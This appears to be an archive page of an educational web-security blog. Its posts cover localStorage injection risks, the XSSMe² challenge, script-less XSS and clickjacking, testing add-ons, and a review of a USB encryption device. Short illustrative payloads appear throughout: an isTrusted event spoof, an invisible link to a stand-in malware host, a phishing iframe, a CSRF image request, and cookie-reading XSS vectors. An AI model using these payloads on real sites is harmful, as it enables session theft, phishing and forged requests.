tl;dr Abstract

To improve performance, particularly for mobile users, many websites have started caching app logic on client devices via HTML5 local storage. Unfortunately, this can make common injection vulnerabilities even more dangerous, as malicious code can invisibly persist in the cache. Real-world examples of this problem have now been discovered in third-party “widgets” embedded across many websites, creating security risks for the companies using such services – even if their sites are otherwise protected against attacks. Striking a balance between security and performance can be difficult, but certain precautions may help prevent an attacker from exploiting local storage caches.
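
As a minimal sketch of the risky pattern (all names hypothetical), consider a site that caches its application code in localStorage and evaluates it on each visit; once an injection attack writes to that cache, the malicious code persists across page loads:

// First visit: cache the application code on the client.
var fetchedScriptText = "/* application code downloaded from the server */";
localStorage.setItem("appCode", fetchedScriptText);

// Later visits: execute whatever the cache holds – including any
// script an attacker managed to plant there via an injection flaw.
eval(localStorage.getItem("appCode"));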

Background

Throughout the history of web development, people have found ways to use and abuse various technologies beyond their intended purposes. Before CSS gained widespread support, many developers created complex layouts with HTML tables. Now that browsers provide far more presentation-layer tools, one can recreate complex images using only CSS. Such tricks can at times be very helpful in overcoming the limits of a browser-based environment, but they can also inadvertently create security issues.



This entry was posted on Wednesday, February 1st, 2012 at 2:57 pm by Joey Tyson and is filed under cool, hacking, software.


Security researcher Mario Heiderich (also creator of the HTML5 Security Cheatsheet and lead developer of PHPIDS) has been posting some interesting cross-site scripting challenges lately that highlight aspects of security on the client side. The most recent, called XSSMe², involved a page with a reflected XSS vulnerability that allowed one to insert arbitrary HTML – no filters applied by the server. The goal? Retrieve a particular bit of data, originally stored in document.cookie, without any user interaction. I say “originally” because the page included JavaScript that attempted to lock down access to the data by removing it from document.cookie and hiding it unless retrieved by a user click. The protective code evolved as bypasses were found, with several tricks employed along the way.

One trick was to hide the variable in a closure. In JavaScript, every function has its own local scope. If you define a variable within a function block, that variable is distinct from one defined in the global scope. In a way, the variable is hidden from code executed in the global scope, though the function can provide a gatekeeper method to access it. Consider this block of code:

// Store the secret, then wall it off inside a closure.
document.cookie = "secret";

var Safe = function() {
    // Captured in the function's local scope, invisible to global code.
    var cookie = document.cookie;
    this.get = function(magicWord) {
        if (magicWord === "please") {
            return cookie; // hands back the closed-over copy
        }
        return null;
    };
};
window.Safe = new Safe();

// Wipe the global copy of the secret.
document.cookie = "";

alert(document.cookie);    // empty string
alert(Safe.get(""));       // null
alert(Safe.get("please")); // "secret"

The first alert returns nothing – document.cookie has been set to an empty string. The second alert only returns null, given the if statement in the definition of Safe.get. But with the third alert, the statement return cookie gets executed – and since that statement sits in the function’s local scope, it returns the cookie variable defined in that scope, which is “secret”. This is the essence of a closure: the function’s local variables live on after it returns, accessible only through code defined in that scope.

Initially, this may seem to be a good defense against cross-site scripting, since the power of XSS comes from all of a page’s scripts executing in the same scope. But as entries in the challenge demonstrated, a page’s environment gives injected code many resources for subverting its own defenses. For instance, the challenge included code that only released the secret variable in response to a mouse click initiated by the user. That check relied on the isTrusted property of the event, which should tell you whether a click came from a script or from the user.

But in JavaScript, objects inherit their properties from a model object called a prototype. If you change a particular prototype, any object that inherits from it picks up the changes you made. In this case, redefining the isTrusted property on the mouse event prototype to always return true meant that spoofed clicks generated automatically by a script would fool the protective code and retrieve the secret value.
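
A rough sketch of that technique follows (the element id is hypothetical, and the details varied by browser; modern browsers have since made isTrusted unforgeable precisely to block this kind of tampering):

// Redefine isTrusted via a getter on the shared event prototype so
// that every event claims to be user-initiated.
Object.defineProperty(Event.prototype, "isTrusted", {
    get: function() { return true; }
});

// A click synthesized by script now passes any isTrusted check.
var click = document.createEvent("MouseEvents");
click.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0,
    false, false, false, false, 0, null);
document.getElementById("unlock").dispatchEvent(click);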

With each new bypass, Mario updated the code with new protections to block them. Eventually, he created a Firefox-specific version that essentially rewrote the entire page to get rid of the original Document Object Model and all its loopholes. If you’re interested in reading more about other bypass techniques and the challenge’s implications for client-side filtering, researcher Krzysztof Kotowicz has an excellent write-up that covers more details. But the challenge is also worth studying as a way of understanding more about web scripting and XSS. I certainly learned more about closures and event spoofing by tackling the puzzle, and it helps illustrate the difficulties of trying to protect against code running in the same origin and same scope. We may be moving towards DOM features that provide enough security to block even client-side attacks, but for right now, any untrusted script has myriad ways of overcoming client-side protections.


This entry was posted on Thursday, October 13th, 2011 at 11:59 pm by Joey Tyson and is filed under cool, hacking, software, Technology & Tool Thursday.


I often talk about cross-site scripting (XSS), and that’s partly because I think it’s a pretty interesting type of vulnerability that many developers tend to overlook. It can be quite dangerous, but can also be quite misunderstood. For one thing, the name can be misleading: exploiting XSS does not always involve scripting, and the proliferation of web technologies has taken XSS issues beyond the browser.

One example of script-less cross-site scripting affected some high-profile MySpace users in 2007. Attackers were able to inject HTML into celebrity MySpace pages, but the service filtered out typical <script> payloads. Seemingly innocent <a> links were allowed, though, and adding a bit of CSS allowed one to create an invisible link that covered the entire page. In this case, clicking anywhere on an infected profile led to a malware download.
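
A hypothetical reconstruction of such a payload (the URL is invented for illustration):

<!-- A transparent link absolutely positioned to cover the entire page,
     so a click anywhere on the profile follows it. -->
<a href="http://malware.example/download"
   style="position: absolute; top: 0; left: 0; width: 100%; height: 100%;
          z-index: 9999; background: transparent;"></a>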

This attack could be one of the first prominent cases of clickjacking, though the term is usually applied to attacks that hijack clicks with malicious inline frames (iframes). Allowing <iframe> elements in user-controlled HTML opens up a range of issues more broadly known as UI redressing. For instance, an iframe that covers the entire page could render a fake login form that appears to be legitimate given the site’s address, leading to a powerful phishing attack. Frames and forms can also be used to bypass CSRF protections.
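
A sketch of the phishing variant (the address is hypothetical): a full-page frame loads attacker-controlled content, which the victim then sees under the trusted site’s own URL.

<!-- An injected iframe stretched over the viewport; its contents
     replace the visible page with a fake login form. -->
<iframe src="http://phish.example/fake-login.html"
        style="position: fixed; top: 0; left: 0; width: 100%; height: 100%;
               border: none; z-index: 9999;"></iframe>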

Of course, you can sometimes launch simple CSRF attacks using only images. If the “src” attribute of an <img> element points to another page, the browser still issues a GET request to that page when it tries to load the image. Without proper CSRF protections, such an attack may be possible without any XSS to begin with. But images can also be a source of information leakage or tracking, since GET requests to a malicious server will also likely include a “Referer” header.
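
A minimal sketch (the endpoint is invented for illustration):

<!-- Fetching the "image" makes the browser send a GET request to the
     target site with the victim's cookies attached – and with the
     current page's URL in the Referer header. -->
<img src="http://bank.example/transfer?to=attacker&amount=1000"
     width="1" height="1" alt="">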

While most XSS payloads do capitalize on the power of JavaScript, keep in mind that a browser can load scripts from many places besides within script tags. Event attributes for other elements and certain CSS properties are just two examples of places a script could slip in. And don’t forget about the risks of browser plug-ins – Flash 0-day issues or malicious PDF files can also be sources of trouble.
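
Two illustrative payloads (both hypothetical; the second relies on the expression() extension honored only by older versions of Internet Explorer):

<!-- Script smuggled into an event attribute of a non-script element. -->
<img src="missing.gif" onerror="alert(document.cookie)">

<!-- Legacy IE evaluated JavaScript embedded in CSS via expression(). -->
<div style="width: expression(alert(document.cookie));">IE-only vector</div>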

Finally, an issue this week served as a reminder that XSS is no longer just a concern within the context of a web browser. As HTML and JavaScript become a greater part of developing apps built outside the browser, XSS may pop up on other platforms. On Monday, a security researcher with the handle superevr disclosed an XSS vulnerability in Skype for iOS. By inserting HTML into the “Full Name” of a user account, one could send messages that, when viewed, would launch code capable of stealing the phone’s address book. And this wasn’t the first time XSS has been a problem for Skype – a vulnerability in desktop versions was found a few months ago, and XSS with shared content led to problems back in 2008.

Alternate labels, such as “HTML injection” or “web content injection,” have been proposed to describe cross-site scripting, but the established term is likely here to stay. Still, remember that protecting against XSS does not simply mean blocking script tags, and keep in mind the power of XSS when integrating web technologies with other platforms.


This entry was posted on Wednesday, September 21st, 2011 at 5:34 pm by Joey Tyson and is filed under hacking, software, Tutorial Tuesday.


If you’re new to the world of testing web application security, you may not be aware of the many Firefox add-ons that can greatly help such endeavors. While others have compiled similar lists in the past, I thought this week would be a good time to share a few of the favorite tools I use in my own web app work.

  1. HttpFox: I’ve blogged about this one in the past; it lists for you every HTTP request made during a given browser session, with details on headers, cookies, parameters, responses, and more. Very handy to monitor traffic when you’re browsing around an app.
  2. HackBar: Another one I’ve mentioned before, the HackBar is a Swiss Army knife that gives you some space for notes, common operations (such as Base64 encoding or MD5 hashing), and perhaps best of all, an easy way to execute manual POST requests.
  3. FireBug: Perhaps one of the best-known Firefox plug-ins, FireBug is a powerful tool for inspecting a page’s DOM, debugging scripts, and investigating script variables.
  4. Cookies Manager+: As you can guess, this add-on lets you view and edit browser cookies to your heart’s content. Useful in tracking and spoofing session information.
  5. Modify Headers: Many web apps use special headers in various ways; this tool lets you set such headers manually when making requests. Spoofing XMLHttpRequest commands is one use case.
  6. User Agent Switcher: I’ve seen apps with vulnerabilities that only affected mobile versions of the site. This extension lets you imitate just about any browser, allowing you to test different site interfaces.
  7. JavaScript Deobfuscator: This is one add-on I only recently discovered, but I can already tell it will be quite useful. It logs JavaScript functions as they’re compiled or executed by the browser, which is particularly useful in dealing with obfuscated scripts.

This list is by no means exhaustive and is geared towards manual testing, but it certainly provides a solid line-up for anyone looking to experiment with web app security. It also shows how easy it can be to get started tinkering with web apps. While I use Chrome for my everyday browsing, I use my tricked-out Firefox setup when I want to dig deeper. If you’re starting out, try using these add-ons against an educational app, such as WebGoat, Gruyere, or DVWA.


This entry was posted on Thursday, July 21st, 2011 at 5:38 pm by Joey Tyson and is filed under hacking, software, Technology & Tool Thursday.


Ever wonder how we came to have the technologies and programming languages used today? Yahoo’s senior JavaScript architect Douglas Crockford gave a presentation in early 2010 that traces the developments that brought us the beloved and hated language powering client-side web behaviors. The video runs nearly two hours and is only the first in a series on JavaScript, but Crockford relates many interesting stories about the history of computing and notes patterns in how technology tends to develop. Check it out if you want to learn more about the background of that quirky yet powerful bit of tech we call JavaScript:

Crockford on JavaScript: The Early Years


This entry was posted on Tuesday, June 28th, 2011 at 2:56 pm by Joey Tyson and is filed under cool, general, software, Tutorial Tuesday.


Recently I had the chance to test out a clever little device called the hiddn Crypto Adapter. Made by Norway-based High Density Devices, the adapter looks somewhat like a miniature desk calculator with a USB port instead of a display, but its simple appearance belies some powerful functionality: transparent, real-time encryption of USB drives with two-factor authentication.

The adapter essentially acts as a proxy between your computer and a USB drive, meaning it needs no software, has no operating system requirement, and works with everything from a flash memory stick to an external hard drive. All communication with the USB device is encrypted on the fly using 256-bit AES via a certified FIPS 140-2 Level 3 crypto module, but the key isn’t stored on the drive: at the front of the hiddn adapter is a smart card slot.

When you insert a smart card, you have to enter the corresponding PIN code to use it. (After three unsuccessful attempts, the card becomes locked until a longer PUK code is given.) The device does not appear as an active USB device in the OS until a card is verified, and becomes “unplugged” when the card is removed. The encryption key (or half of it in split-key mode) stays on the smart card, making an encrypted drive unusable without it.

Setting up and operating the hiddn system is very straightforward. You connect it to your computer with a USB cable, plug a drive into the top USB port, insert your smart card, and then enter your PIN. From there, the experience is no different than using a USB drive normally – there’s not even a difference in speed.

When I first connected an unencrypted drive on a Windows machine, it appeared as an unformatted drive. After formatting, it behaved just as it would when plugged in directly. (A few times I had to reconnect the adapter to get Windows to recognize a new drive if I didn’t “eject” the drive first or tried a bad PIN, but those were minor issues.) Trying to use the drive without the hiddn adapter after it had been encrypted brought up another prompt to format – Windows could tell there was a volume, but it was completely unreadable.

After using the hiddn Crypto Adapter for a short time, I started wondering why no one else had thought of it before – or at least why I’d never heard of it before. It’s a great tool for anyone wanting a no-hassle method to encrypt removable storage. The only potential drawback is pricing: two adapters and two sets of pre-configured smart cards can run almost $900. High Density Devices offers a few different packages of units and cards, ranging from one of each to ten, as well as an enterprise key management system for creating new cards. But while some users may find hiddn too expensive for personal use, its flexibility, ease of use, and high security make for a combination that’s hard to beat.


This entry was posted on Thursday, June 2nd, 2011 at 12:30 pm by Joey Tyson and is filed under cool, data protection, hardware, Technology & Tool Thursday.